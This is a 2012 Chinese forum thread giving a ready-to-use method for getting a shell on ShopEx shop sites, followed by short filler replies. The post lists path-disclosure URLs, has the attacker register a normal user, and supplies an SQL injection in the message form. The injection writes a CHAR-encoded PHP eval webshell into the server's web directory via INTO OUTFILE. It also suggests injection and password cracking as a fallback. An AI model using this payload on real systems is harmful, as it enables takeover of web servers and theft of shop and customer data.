查看: 2308|回复: 25

shopex前台普通用户getshell最新漏洞

[复制链接]
发表于 2012-9-30 06:25:53 | 显示全部楼层 |阅读模式
利用方法:

第一个:想办法找到目标网站的绝对路径


http://www.wooyun.in/install/svinfo.php?phpinfo=true

http://www.wooyun.in/core/api/shop_api.php
http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php
http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_goodstype.php
http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_brand.php

shopex存在很多爆路径的漏洞,请自行研究。

第二个:注册一个普通用户

http://www.wooyun.in/?passport-signup.html

第三个:

发送消息

http://www.wooyun.in/?member-send.html


代码

wooyun.in' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #
一句话的密码是#
这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。
如果无法getshell的话,也可以尝试注入,破密码进后台也一样
shell图


​

​

发表于 2012-9-30 09:01:34 | 显示全部楼层
孜孜不倦, 吾等楷模 …………  
发表于 2012-10-1 07:26:49 | 显示全部楼层
一山不能容二虎,除非一公和一母!  
发表于 2012-10-8 22:07:52 | 显示全部楼层
我的啦嘿嘿  
发表于 2012-10-10 18:42:15 | 显示全部楼层
琴棋书画不会,洗衣做饭嫌累。  
发表于 2014-11-17 00:22:29 | 显示全部楼层
回个帖子支持一下!
发表于 2014-12-4 11:53:02 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-12-27 11:22:21 | 显示全部楼层
(*^__^*) 嘻嘻……  
发表于 2015-1-27 12:37:20 | 显示全部楼层
我好想升级  
发表于 2015-3-1 10:35:13 | 显示全部楼层
呵呵,明白了  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则